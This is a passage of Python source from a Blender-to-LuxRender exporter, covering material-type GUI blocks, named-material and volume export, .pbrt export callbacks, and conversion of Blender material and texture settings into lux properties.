    else: matname = "%s:%s"%(mat.getName(), keyname)
    if mat:
        mattype = luxProp(mat, kn+"type", "matte")
        # Set backwards compatibility of glossy material from plastic and substrate
        if(mattype.get() == "substrate" or mattype.get() == "glossy" or mattype.get() == "plastic"):
            mattype.set("uber")
        # this is reverse order than in shown in the dropdown list
        # FIXME translucent
        materials = ["uber",
            #"translucent", "measured", "substrate", "plastic"
            "subsurface", "mixmat", "mirror", "metal", "matte", "kdsubsurface", "glass"]
        if level == 0: materials = ["light","boundvolume"]+materials
        # material-type dropdown plus advanced/help toggles
        if gui:
            icon = icon_mat
            if mattype.get() == "mix": icon = icon_matmix
            if level == 0: gui.newline("Material type:", 12, level, icon, [0.75,0.5,0.25])
            else: gui.newline(name+":", 12, level, icon, scalelist([0.75,0.6,0.25],2.0/(level+2)))
        link = luxOption("type", mattype, materials, " TYPE", "select material type", gui)
        showadvanced = luxProp(mat, kn+"showadvanced", "false")
        luxBool("advanced", showadvanced, "Advanced", "Show advanced options", gui, 0.6)
        showhelp = luxProp(mat, kn+"showhelp", "false")
        luxHelp("help", showhelp, "Help", "Show Help Information", gui, 0.4)
        # show copy/paste menu button
        if gui: Draw.PushButton(">", evtLuxGui, gui.xmax+gui.h, gui.y-gui.h, gui.h, gui.h, "Menu", lambda e,v: showMatTexMenu(mat,keyname,False))
        # Draw Material preview option (only offered at the top level)
        showmatprev = False
        if level == 0:
            showmatprev = True
        if gui: luxPreview(mat, keyname, 0, showmatprev, True, None, gui, level, [0.746, 0.625, 0.5])
        if gui: gui.newline()
        has_object_options = 0 # disable object options by default
        has_bump_options = 0 # disable bump mapping options by default
        has_emission_options = 0 # disable emission options by default
        has_compositing_options = 0 # disable compositing options by default
        # per-type parameter blocks; each branch enables the common option
        # groups (bump/object/emission/compositing) that apply to that type
        if mattype.get() == "mixmat":
            (str,link) = c((str,link), luxFloatTexture("amount", keyname, 0.5, 0.0, 1.0, "amount", "The degree of mix between the two materials", mat, gui, level+1))
            (str,link) = c((str,link), luxMaterialBlock("mat1", "namedmaterial1", keyname, mat, gui, level+1))
            (str,link) = c((str,link), luxMaterialBlock("mat2", "namedmaterial2", keyname, mat, gui, level+1))
            has_bump_options = 0
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 0
        if mattype.get() == "boundvolume":
            # boundvolume emits a Volume definition and returns immediately
            link = ""
            voltype = luxProp(mat, kn+"vol.type", "homogeneous")
            vols = ["homogeneous", "exponential"]
            vollink = luxOption("type", voltype, vols, "type", "", gui)
            if voltype.get() == "homogeneous":
                link = "Volume \"homogeneous\""
            if voltype.get() == "exponential":
                link = "Volume \"exponential\""
            if gui: gui.newline("absorption:", 0, level+1)
            link += luxRGB("sigma_a", luxProp(mat, kn+"vol.sig_a", "1.0 1.0 1.0"), 1.0, "sigma_a", "The absorption cross section", gui)
            if gui: gui.newline("scattering:", 0, level+1)
            link += luxRGB("sigma_s", luxProp(mat, kn+"vol.sig_b", "0.0 0.0 0.0"), 1.0, "sigma_s", "The scattering cross section", gui)
            if gui: gui.newline("emission:", 0, level+1)
            link += luxRGB("Le", luxProp(mat, kn+"vol.le", "0.0 0.0 0.0"), 1.0, "Le", "The volume's emission spectrum", gui)
            if gui: gui.newline("assymetry:", 0, level+1)
            link += luxFloat("g", luxProp(mat, kn+"vol.g", 0.0), 0.0, 100.0, "g", "The phase function asymmetry parameter", gui)
            if voltype.get() == "exponential":
                if gui: gui.newline("form:", 0, level+1)
                link += luxFloat("a", luxProp(mat, kn+"vol.a", 1.0), 0.0, 100.0, "a/scale", "exponential::a parameter in the ae^{-bh} formula", gui)
                link += luxFloat("b", luxProp(mat, kn+"vol.b", 2.0), 0.0, 100.0, "b/falloff", "exponential::b parameter in the ae^{-bh} formula", gui)
                if gui: gui.newline("updir:", 0, level+1)
                link += luxVector("updir", luxProp(mat, kn+"vol.updir", "0 0 1"), -1.0, 1.0, "updir", "Up direction vector", gui, 2.0)
            link += str_opt
            has_bump_options = 0
            has_object_options = 0
            has_emission_options = 0
            return (str, link)
        if mattype.get() == "glass":
            (str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
            (str,link) = c((str,link), luxSpectrumTexture("Kt", keyname, "1.0 1.0 1.0", 1.0, "transmission", "", mat, gui, level+1))
            (str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == "matte":
            orennayar = luxProp(mat, keyname+".orennayar", "false")
            (str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, "1.0 1.0 1.0", 1.0, "diffuse", "", mat, gui, level+1))
            luxCollapse("orennayar", orennayar, "Oren-Nayar", "Enable Oren-Nayar BRDF", gui, 2.0)
            if orennayar.get() == "true":
                (str,link) = c((str,link), luxFloatTexture("sigma", keyname, 0.0, 0.0, 100.0, "sigma", "sigma value for Oren-Nayar BRDF", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        # if mattype.get() == "translucent":
        # orennayar = luxProp(mat, keyname+".orennayar", "false")
        # (str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
        # (str,link) = c((str,link), luxSpectrumTexture("Kt", keyname, "1.0 1.0 1.0", 1.0, "transmission", "", mat, gui, level+1))
        # luxCollapse("orennayar", orennayar, "Oren-Nayar", "Enable Oren-Nayar BRDF", gui, 2.0)
        # if orennayar.get() == "true":
        # (str,link) = c((str,link), luxFloatTexture("sigma", keyname, 0.0, 0.0, 100.0, "sigma", "", mat, gui, level+1))
        # has_bump_options = 1
        # has_object_options = 1
        # has_emission_options = 1
        # has_compositing_options = 1
        if mattype.get() == "metal":
            if gui: gui.newline("name:", 0, level+1)
            metalname = luxProp(mat, kn+"metal.name", "")
            metals = ["Ag", "Al", "Au", "MgO"]
            # keep a user-selected spd filename selectable in the dropdown
            if not(metalname.get() in metals):
                metals.append(metalname.get())
            metallink = luxOption("name", metalname, metals, "name", "", gui, 1.88)
            if gui: Draw.Button("...", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, "click to select a spd file",lambda e,v:Window.FileSelector(lambda s:metalname.set(s), "Select spd file"))
            link += luxstr(metallink)
            anisotropic = luxProp(mat, kn+"metal.anisotropic", "false")
            if gui:
                gui.newline("")
                Draw.Toggle("A", evtLuxGui, gui.x-gui.h, gui.y-gui.h, gui.h, gui.h, anisotropic.get()=="true", "anisotropic roughness", lambda e,v:anisotropic.set(["false","true"][bool(v)]))
            if True: # anisotropic.get()=="true":
                (str,link) = c((str,link), luxExponentTexture("roughness", keyname, 0.002, 0.0, 1.0, "u-exponent", "", mat, gui, level+1))
            else:
                # NOTE(review): dead branch — kept from the disabled anisotropic path above
                (s, l) = luxExponentTexture("uroughness", keyname, 0.002, 0.0, 1.0, "exponent", "", mat, gui, level+1)
                (str,link) = c((str,link), (s, l))
                link += l.replace("uroughness", "vroughness", 1)
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == "mirror":
            (str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == "subsurface":
            (str,link) = c((str,link), luxSpectrumTexture("sigma_a", keyname, ".0011 .0024 .014", 100.0, "absorption coefficient", "", mat, gui, level+1))
            (str,link) = c((str,link), luxSpectrumTexture("sigma_prime_s", keyname, "2.55 3.21 3.77", 100.0, "scattering coefficient", "", mat, gui, level+1))
            (str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == "kdsubsurface":
            (str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, ".5 .5 .5", 1.0, "diffuse coefficient", "", mat, gui, level+1))
            (str,link) = c((str,link), luxFloatTexture("mean free path", keyname, 1.0, 0.01, 100.0, "mean free path", "mean free path", mat, gui, level+1))
            (str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == "uber":
            (str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, "1.0 1.0 1.0", 1.0, "diffuse", "", mat, gui, level+1))
            (str,link) = c((str,link), luxSpectrumTexture("Ks", keyname, "1.0 1.0 1.0", 1.0, "glossy", "", mat, gui, level+1))
            (str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "0.0 0.0 0.0", 1.0, "specular", "", mat, gui, level+1))
            if gui: gui.newline("")
            (str,link) = c((str,link), luxExponentTexture("roughness", keyname, 0.002, 0.0, 1.0, "roughness", "", mat, gui, level+1))
            has_bump_options = 1
            has_object_options = 1
            has_emission_options = 1
            has_compositing_options = 1
        if mattype.get() == 'null':
            has_emission_options = 1
        # Bump mapping options (common)
        if (has_bump_options == 1):
            usebump = luxProp(mat, keyname+".usebump", "false")
            luxCollapse("usebump", usebump, "Bump Map", "Enable Bump Mapping options", gui, 2.0)
            if usebump.get() == "true":
                (str,link) = c((str,link), luxFloatTexture("bumpmap", keyname, 0.0, -1.0, 1.0, "bumpmap", "bumpmap scale in meters - i.e. 0.01 = 1 cm", mat, gui, level+1))
        # emission options (common)
        if (level == 0):
            if (has_emission_options == 1):
                if gui: gui.newline("", 2, level, None, [0.6,0.6,0.4])
                useemission = luxProp(mat, "emission", "false")
                luxCollapse("useemission", useemission, "Emission", "Enable emission options", gui, 2.0)
                if useemission.get() == "true":
                    # emission GUI is here but lux export will be done later
                    luxLight("", "", mat, gui, level)
                else: luxProp(mat, "emission", "false").set("false") # prevent from exporting later
        # Compositing options (common)
        # Note - currently only display options when using distributedpath integrator
        integratortype = luxProp(Scene.GetCurrent(), "sintegrator.type", "bidirectional")
        if False: # (integratortype.get() == "distributedpath" and level == 0):
            if (has_compositing_options == 1):
                if gui: gui.newline("", 2, level, None, [0.4,0.4,0.6])
                usecompo = luxProp(mat, "compo", "false")
                luxCollapse("compo", usecompo, "Compositing", "Enable Compositing options", gui, 2.0)
                if usecompo.get() == "true":
                    if gui: gui.newline("", 2, level, None, [0.35,0.35,0.55])
                    usecompoviz = luxProp(mat, "compo_viz", "false")
                    luxCollapse("compo_viz", usecompoviz, "Visibility", "Enable Visibility Compositing options", gui, 2.0)
                    if usecompoviz.get() == "true":
                        if gui: gui.newline("View", 2, level, None, [0.35,0.35,0.55])
                        compovizmat = luxProp(mat, "compo_viz_mat", "true")
                        link += luxBool("compo_visible_material", compovizmat, "Material", "Enable View Visibility of Material", gui, 1.0)
                        compovizemi = luxProp(mat, "compo_viz_emi", "true")
                        link += luxBool("compo_visible_emission", compovizemi, "Emission", "Enable View Visibility of Emission", gui, 1.0)
                        if gui: gui.newline("Indirect", 2, level, None, [0.35,0.35,0.55])
                        compovizmati = luxProp(mat, "compo_viz_mati", "true")
                        link += luxBool("compo_visible_indirect_material", compovizmati, "Material", "Enable InDirect Visibility of Material", gui, 1.0)
                        compovizemii = luxProp(mat, "compo_viz_emii", "true")
                        link += luxBool("compo_visible_indirect_emission", compovizemii, "Emission", "Enable InDirect Visibility of Emission", gui, 1.0)
                    if gui: gui.newline("", 2, level, None, [0.4,0.4,0.6])
                    overridealpha = luxProp(mat, "compo_o_alpha", "false")
                    link += luxCollapse("compo_override_alpha", overridealpha, "Override Alpha", "Enable Manual control of alpha value", gui, 2.0)
                    if overridealpha.get() == "true":
                        if gui: gui.newline("Alpha", 2, level, None, [0.4,0.4,0.6])
                        link += luxFloat("compo_override_alpha_value", luxProp(mat, "compo_o_alpha_v", 0.0), 0.0, 1.0, "Alpha", "Alpha Value", gui, 2.0, 1)
                    usecolorkey = luxProp(mat, "compo_usekey", "false")
                    if gui: gui.newline("", 2, level, None, [0.35,0.35,0.55])
                    link += luxCollapse("compo_use_key", usecolorkey, "Chroma Key", "Enable Chroma Object key", gui, 2.0)
                    if usecolorkey.get() == "true":
                        if gui: gui.newline("Key", 2, level, None, [0.35,0.35,0.55])
                        link += luxRGB("compo_key_color", luxProp(mat, "compo_key_color", "0.0 0.0 1.0"), 1.0, "key", "", gui, 2.0)
        # transformation options (common)
        if (level == 0) and mattype.get() not in ['portal', 'null']:
            if gui: gui.newline("", 2, level, None, [0.6,0.6,0.4])
            usetransformation = luxProp(mat, "transformation", "false")
            luxCollapse("usetransformation", usetransformation, "Texture Transformation", "Enable transformation option", gui, 2.0)
            if usetransformation.get() == "true":
                scale = luxProp(mat, "3dscale", 1.0)
                rotate = luxProp(mat, "3drotate", "0 0 0")
                translate = luxProp(mat, "3dtranslate", "0 0 0")
                if gui:
                    gui.newline("scale:", -2, level, icon_map3dparam)
                    luxVectorUniform("scale", scale, 0.001, 1000.0, "scale", "scale-vector", gui, 2.0)
                    gui.newline("rot:", -2, level, icon_map3dparam)
                    luxVector("rotate", rotate, -360.0, 360.0, "rotate", "rotate-vector", gui, 2.0)
                    gui.newline("move:", -2, level, icon_map3dparam)
                    luxVector("translate", translate, -1000.0, 1000.0, "move", "translate-vector", gui, 2.0)
                # wrap the declaration in an inverse texture-space transform
                str = ("TransformBegin\n\tScale %f %f %f\n"%( 1.0/scale.getVector()[0],1.0/scale.getVector()[1],1.0/scale.getVector()[2] ))+("\tRotate %f 1 0 0\n\tRotate %f 0 1 0\n\tRotate %f 0 0 1\n"%rotate.getVector())+("\tTranslate %f %f %f\n"%translate.getVector()) + str + "TransformEnd\n"
        # Object options (common)
        if (level == 0) and (has_object_options == 1):
            if gui: gui.newline("Mesh:", 2, level, icon, [0.6,0.6,0.4])
            usesubdiv = luxProp(mat, "subdiv", "false")
            luxBool("usesubdiv", usesubdiv, "Subdivision", "Enable Loop Subdivision options", gui, 1.0)
            # usedisp = luxProp(mat, "dispmap", "false")
            # luxBool("usedisp", usedisp, "Displacement Map", "Enable Displacement mapping options", gui, 1.0)
            if usesubdiv.get() == "true": # or usedisp.get() == "true":
                luxInt("sublevels", luxProp(mat, "sublevels", 2), 0, 12, "sublevels", "The number of levels of object subdivision", gui, 2.0)
                # sharpbound = luxProp(mat, "sharpbound", "false")
                # luxBool("sharpbound", sharpbound, "Sharpen Bounds", "Sharpen boundaries during subdivision", gui, 1.0)
                # nsmooth = luxProp(mat, "nsmooth", "true")
                # luxBool("nsmooth", nsmooth, "Smooth", "Smooth faces during subdivision", gui, 1.0)
            # if usedisp.get() == "true":
            # (str,ll) = c((str,link), luxDispFloatTexture("dispmap", keyname, 0.1, -10, 10.0, "dispmap", "Displacement Mapping amount", mat, gui, level+1))
            # luxFloat("sdoffset", luxProp(mat, "sdoffset", 0.0), 0.0, 1.0, "Offset", "Offset for displacement map", gui, 2.0)
            # usesubdiv.set("true")
        if mattype.get() == "light":
            # area-light materials are emitted by the caller, not as named materials
            return (str, link)
        str += "MakeNamedMaterial \"%s\"%s\n"%(matname, link)
    return (str, " \"string %s\" [\"%s\"]"%(luxname, matname))
def luxMaterial(mat, gui=None):
    """Export a Blender material as a named lux material.

    Converts the material on the fly when it has no lux definition yet,
    then builds the MakeNamedMaterial text via luxMaterialBlock() and
    caches the reference snippet in the material's "link" property.
    Returns the scene-file declaration text ("" when mat is None).
    """
    out = ""
    if not mat:
        return out
    # no lux definition yet -> best-effort conversion from Blender settings
    if luxProp(mat, "type", "").get() == "":
        print("Blender material \"%s\" has no lux material definition, converting..."%(mat.getName()))
        try:
            convertMaterial(mat)
        except: pass
    (out, link) = luxMaterialBlock("", "", "", mat, gui, 0)
    if luxProp(mat, "type", "matte").get() != "light":
        link = "NamedMaterial \"%s\""%(mat.getName())
    # export emission options (no gui)
    if luxProp(mat, "emission", "false").get() == "true":
        (estr, elink) = luxLight("", "", mat, None, 0)
        out += estr
        link += "\n\tAreaLightSource \"area\" "+elink
    luxProp(mat, "link", "").set("".join(link))
    return out
def luxVolume(mat, gui=None):
    """Export a volume definition for *mat* and cache its link snippet.

    Returns the declaration text produced by luxMaterialBlock(), or ""
    when no material is given.
    """
    if not mat:
        return ""
    (exported, link) = luxMaterialBlock("", "", "", mat, gui, 0)
    luxProp(mat, "link", "").set("".join(link))
    return exported
runRenderAfterExport = None
def CBluxExport(default, run):
    """Callback: export the current frame to a .pbrt scene file.

    default: when true, write straight to <datadir>/default.pbrt;
             otherwise open a file selector for the target path.
    run:     remembered in the module-global runRenderAfterExport so the
             export code can start rendering afterwards.
    """
    global runRenderAfterExport
    runRenderAfterExport = run
    if not default:
        # interactive export: let the user choose the output filename
        Window.FileSelector(save_still, "Export", sys.makename(Blender.Get("filename"), ".pbrt"))
        return
    datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
    if datadir == "":
        datadir = Blender.Get("datadir")
    import os.path
    if not os.path.exists(datadir):
        Draw.PupMenu("ERROR: output directory does not exist!")
        if LuxIsGUI:
            Draw.Redraw()
        return
    save_still(datadir + os.sep + "default.pbrt")
def CBluxAnimExport(default, run, fileselect=True):
    """Callback: export the animation to a .pbrt scene file.

    default:    when true, write to <datadir>/default.pbrt.
    run:        unused here; kept for callback-signature compatibility
                with CBluxExport.
    fileselect: for non-default exports, whether to open a file selector
                instead of deriving the name from the .blend filename.
    """
    if default:
        datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
        if datadir == "":
            datadir = Blender.Get("datadir")
        import os.path
        if not os.path.exists(datadir):
            Draw.PupMenu("ERROR: output directory does not exist!")
            if LuxIsGUI:
                Draw.Redraw()
            return
        save_anim(datadir + os.sep + "default.pbrt")
        return
    if fileselect:
        Window.FileSelector(save_anim, "Export", sys.makename(Blender.Get("filename"), ".pbrt"))
        return
    # the datadir lookup is kept (it registers the scene property) even
    # though the filename is derived from the .blend file instead
    datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
    if datadir == "":
        datadir = Blender.Get("datadir")
    save_anim(sys.makename(Blender.Get("filename") , ".pbrt"))
# convert a Blender material to lux material
def convertMaterial(mat):
    """Derive a lux material definition from Blender material settings.

    Maps Blender shading options (emit, alpha, ray-mirror, spec/hardness
    and the texture channels) onto lux properties stored on *mat* via
    luxProp(). Any existing 'pbrtblend' property block is wiped first.
    """
    # append "." to a non-empty key prefix
    def dot(str):
        if str != "": return str+"."
        return str
    # append ":" to a non-empty key prefix
    def ddot(str):
        if str != "": return str+":"
        return str
    # translate a Blender constant value into the matching lux string
    def mapConstDict(value, constant_dict, lux_dict, default=None):
        for k,v in constant_dict.items():
            if (v == value) and (lux_dict.has_key(k)):
                return lux_dict[k]
        return default
    # convert one texture slot's mapping settings (UV / flat / tube / sphere)
    def convertMapping(name, tex):
        if tex.texco == Texture.TexCo["UV"]:
            luxProp(mat, dot(name)+"mapping","").set("uv")
            luxProp(mat, dot(name)+"uscale", 1.0).set(tex.size[0])
            luxProp(mat, dot(name)+"vscale", 1.0).set(-tex.size[1])
            luxProp(mat, dot(name)+"udelta", 0.0).set(tex.ofs[0]+0.5*(1.0-tex.size[0]))
            luxProp(mat, dot(name)+"vdelta", 0.0).set(-tex.ofs[1]-0.5*(1.0-tex.size[1]))
            if tex.mapping != Texture.Mappings["FLAT"]:
                print("Material Conversion Warning: for UV-texture-input only FLAT mapping is supported\n")
        else:
            if tex.mapping == Texture.Mappings["FLAT"]:
                luxProp(mat, dot(name)+"mapping","").set("planar") # make planar-mapping convert correctly from blender(WYSIWYG)- jens
                luxProp(mat, dot(name)+"v1", "1.0 1.0 1.0").setVector((0.5*tex.size[0], 0.0, 0.0))
                luxProp(mat, dot(name)+"v2", "0.0 0.0 0.0").setVector((0.0, -0.5*tex.size[1], -0.0))
                luxProp(mat, dot(name)+"udelta", 0.0).set(tex.ofs[0]+0.5)
                luxProp(mat, dot(name)+"vdelta", 0.0).set(-tex.ofs[1]-0.5)
            elif tex.mapping == Texture.Mappings["TUBE"]:
                luxProp(mat, dot(name)+"mapping","").set("cylindrical")
            elif tex.mapping == Texture.Mappings["SPHERE"]:
                luxProp(mat, dot(name)+"mapping","").set("spherical")
            else: luxProp(mat, dot(name)+"mapping","").set("planar")
            luxProp(mat, dot(name)+"3dscale", "1.0 1.0 1.0").setVector((1.0/tex.size[0], 1.0/tex.size[1], 1.0/tex.size[2]))
            luxProp(mat, dot(name)+"3dtranslate", "0.0 0.0 0.0").setVector((-tex.ofs[0], -tex.ofs[1], -tex.ofs[2]))
    def convertColorband(colorband):
        # colorbands are not supported in lux - so lets extract a average low-side and high-side color
        cb = [colorband[0]] + colorband[:] + [colorband[-1]]
        cb[0][4], cb[-1][4] = 0.0, 1.0
        low, high = [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]
        for i in range(1, len(cb)):
            for c in range(4):
                low[c] += (cb[i-1][c]*(1.0-cb[i-1][4]) + cb[i][c]*(1.0-cb[i][4])) * (cb[i][4]-cb[i-1][4])
                high[c] += (cb[i-1][c]*cb[i-1][4] + cb[i][c]*cb[i][4]) * (cb[i][4]-cb[i-1][4])
        return low, high
    # create an imagemap texture property set from a Blender image texture
    def createLuxTexture(name, tex):
        texture = tex.tex
        convertMapping(name, tex)
        if (texture.type == Texture.Types["IMAGE"]) and (texture.image) and (texture.image.filename!=""):
            luxProp(mat, dot(name)+"texture", "").set("imagemap")
            luxProp(mat, dot(name)+"filename", "").set(texture.image.filename)
            luxProp(mat, dot(name)+"wrap", "").set(mapConstDict(texture.extend, Texture.ExtendModes, {"REPEAT":"repeat", "EXTEND":"clamp", "CLIP":"black"}, ""))
        else:
            print "WARNING: Unable to convert texture type %s" % dot(name)
    # recursively convert a stack of texture slots into nested lux "mix" textures
    def convertTextures(basename, texs, type="float", channel="col", val=1.0):
        tex = texs.pop()
        texture = tex.tex
        isImagemap = (texture.type == Texture.Types["IMAGE"]) and (texture.image) and (texture.image.filename!="")
        # derive the low/high end values and blend factors for this slot
        if channel == "col":
            if texture.flags & Texture.Flags["COLORBAND"] > 0:
                cbLow, cbHigh = convertColorband(texture.colorband)
                val1, alpha1, val2, alpha2 = (cbLow[0],cbLow[1],cbLow[2]), cbLow[3]*tex.colfac, (cbHigh[0], cbHigh[1], cbHigh[2]), cbHigh[3]*tex.colfac
                if tex.noRGB:
                    lum1, lum2 = (val1[0]+val1[1]+val1[2])/3.0, (val2[0]+val2[1]+val2[2])/3.0
                    val1, val2 = (tex.col[0]*lum1,tex.col[1]*lum1,tex.col[2]*lum1), (tex.col[0]*lum2,tex.col[1]*lum2,tex.col[2]*lum2)
            elif isImagemap and not(tex.noRGB): val1, alpha1, val2, alpha2 = (0.0,0.0,0.0), tex.colfac, (1.0,1.0,1.0), tex.colfac
            else: val1, alpha1, val2, alpha2 = tex.col, 0.0, tex.col, tex.colfac
        elif channel == "nor": val1, alpha1, val2, alpha2 = tex.norfac * 0.01, 0.0, tex.norfac * 0.01, 1.0
        else: val1, alpha1, val2, alpha2 = 1.0, 0.0, 1.0, tex.varfac
        # honour the slot's "negative" flag (and an inverted normal factor)
        if (tex.neg)^((channel=="nor") and (tex.mtNor<0)): val1, alpha1, val2, alpha2 = val2, alpha2, val1, alpha1
        luxProp(mat, dot(basename)+"textured", "").set("true")
        name = basename
        if (alpha1 < 1.0) or (alpha2 < 1.0): # texture with transparency
            luxProp(mat, dot(basename)+"texture", "").set("mix")
            if alpha1 == alpha2: # constant alpha
                luxProp(mat, ddot(basename)+"amount.value", 1.0).set(alpha1)
            else:
                createLuxTexture(ddot(basename)+"amount", tex)
                luxProp(mat, ddot(basename)+"amount:tex1.value", 1.0).set(alpha1)
                luxProp(mat, ddot(basename)+"amount:tex2.value", 1.0).set(alpha2)
            # transparent to next texture
            name = ddot(basename)+"tex1"
            if len(texs) > 0:
                convertTextures(ddot(basename)+"tex1", texs, type, channel, val)
            else:
                if type=="float": luxProp(mat, ddot(basename)+"tex1.value", 1.0).set(val)
                else: luxProp(mat, ddot(basename)+"tex1.value", "1.0 1.0 1.0").setRGB((val[0], val[1], val[2]))
            name = ddot(basename)+"tex2"
        if val1 == val2: # both ends equal -> plain constant value
            if type == "col": luxProp(mat, dot(name)+"value", "1.0 1.0 1.0").setRGB(val1)
            else: luxProp(mat, dot(name)+"value", 1.0).set(val1)
        else:
            # differing ends -> real texture with per-end values
            createLuxTexture(name, tex)
            if type == "col": luxProp(mat, ddot(name)+"tex1.value", "1.0 1.0 1.0").setRGB(val1)
            else: luxProp(mat, ddot(name)+"tex1.value", 1.0).set(val1)
            if type == "col": luxProp(mat, ddot(name)+"tex2.value", "1.0 1.0 1.0").setRGB(val2)
            else: luxProp(mat, ddot(name)+"tex2.value", 1.0).set(val2)
    # gather the texture slots mapped to COL and convert them to *name*
    def convertDiffuseTexture(name):
        texs = []
        for tex in mat.getTextures():
            if tex and (tex.mapto & Texture.MapTo["COL"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
        if len(texs) > 0:
            luxProp(mat, name, "").setRGB((mat.ref, mat.ref, mat.ref))
            convertTextures(name, texs, "col", "col", (mat.R, mat.G, mat.B))
    # gather the texture slots mapped to CSP (specular color)
    def convertSpecularTexture(name):
        texs = []
        for tex in mat.getTextures():
            if tex and (tex.mapto & Texture.MapTo["CSP"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
        if len(texs) > 0:
            luxProp(mat, name, "").setRGB((mat.ref*mat.spec, mat.ref*mat.spec, mat.ref*mat.spec))
            convertTextures(name, texs, "col", "col", (mat.specR, mat.specG, mat.specB))
    # gather the texture slots mapped to CMIR (mirror color)
    def convertMirrorTexture(name):
        texs = []
        for tex in mat.getTextures():
            if tex and (tex.mapto & Texture.MapTo["CMIR"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
        if len(texs) > 0:
            luxProp(mat, name, "").setRGB((mat.ref, mat.ref, mat.ref))
            convertTextures(name, texs, "col", "col", (mat.mirR, mat.mirG, mat.mirB))
    # gather the texture slots mapped to NOR and convert them to a bumpmap
    def convertBumpTexture(basename):
        texs = []
        for tex in mat.getTextures():
            if tex and (tex.mapto & Texture.MapTo["NOR"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
        if len(texs) > 0:
            name = basename+":bumpmap"
            luxProp(mat, basename+".usebump", "").set("true")
            luxProp(mat, dot(name)+"textured", "").set("true")
            luxProp(mat, name, "").set(1.0)
            convertTextures(name, texs, "float", "nor", 0.0)
    # build a lux "matte" sub-material at key *name*
    def makeMatte(name):
        luxProp(mat, dot(name)+"type", "").set("matte")
        luxProp(mat, name+":Kd", "").setRGB((mat.R*mat.ref, mat.G*mat.ref, mat.B*mat.ref))
        convertDiffuseTexture(name+":Kd")
        convertBumpTexture(name)
    # build a lux "glossy" sub-material with the given roughness
    def makeGlossy(name, roughness):
        luxProp(mat, dot(name)+"type", "").set("glossy")
        luxProp(mat, name+":Kd", "").setRGB((mat.R*mat.ref, mat.G*mat.ref, mat.B*mat.ref))
        luxProp(mat, name+":Ks", "").setRGB((mat.specR*mat.spec*0.5, mat.specG*mat.spec*0.5, mat.specB*mat.spec*0.5))
        luxProp(mat, name+":uroughness", 0.0).set(roughness)
        luxProp(mat, name+":vroughness", 0.0).set(roughness)
        convertDiffuseTexture(name+":Kd")
        convertSpecularTexture(name+":Ks")
        convertBumpTexture(name)
    # build a lux "mirror" sub-material
    def makeMirror(name):
        luxProp(mat, dot(name)+"type", "").set("mirror")
        luxProp(mat, name+":Kr", "").setRGB((mat.mirR, mat.mirG, mat.mirB))
        convertMirrorTexture(name+":Kr")
        convertBumpTexture(name)
    # build a lux "glass" sub-material using the Blender IOR
    def makeGlass(name):
        luxProp(mat, dot(name)+"type", "").set("glass")
        luxProp(mat, name+":Kr", "").setRGB((0.0, 0.0, 0.0))
        luxProp(mat, name+":Kt", "").setRGB((mat.R, mat.G, mat.B))
        luxProp(mat, name+":index.iorusepreset", "").set("false")
        luxProp(mat, name+":index", 0.0).set(mat.getIOR())
        convertMirrorTexture(name+":Kr")
        convertDiffuseTexture(name+":Kt")
        convertBumpTexture(name)
    print("convert Blender material \"%s\" to lux material"%(mat.name))
    mat.properties['pbrtblend'] = {} # wipe any previous lux definition
    if mat.emit > 0.0001:
        # emitting materials become lux area lights
        luxProp(mat, "type", "").set("light")
        luxProp(mat, "light.l", "").setRGB((mat.R, mat.G, mat.B))
        luxProp(mat, "light.gain", 1.0).set(mat.emit)
        return
    alpha = mat.alpha
    if not(mat.mode & Material.Modes.RAYTRANSP): alpha = 1.0
    alpha0name, alpha1name = "", ""
    if (alpha > 0.0) and (alpha < 1.0):
        # partially transparent: mix of an opaque (mat1) and a glass (mat2) part
        luxProp(mat, "type", "").set("mix")
        luxProp(mat, ":amount", 0.0).set(alpha)
        alpha0name, alpha1name = "mat2", "mat1"
    if alpha > 0.0:
        mirror = mat.rayMirr
        if not(mat.mode & Material.Modes.RAYMIRROR): mirror = 0.0
        mirror0name, mirror1name = alpha1name, alpha1name
        if (mirror > 0.0) and (mirror < 1.0):
            # partially mirroring: mix of a diffuse (mat1) and a reflective (mat2) part
            luxProp(mat, dot(alpha1name)+"type", "").set("mix")
            luxProp(mat, alpha1name+":amount", 0.0).set(1.0 - mirror)
            mirror0name, mirror1name = ddot(alpha1name)+"mat1", ddot(alpha1name)+"mat2"
        if mirror > 0.0:
            if mat.glossMir < 1.0: makeGlossy(mirror1name, 1.0-mat.glossMir**2)
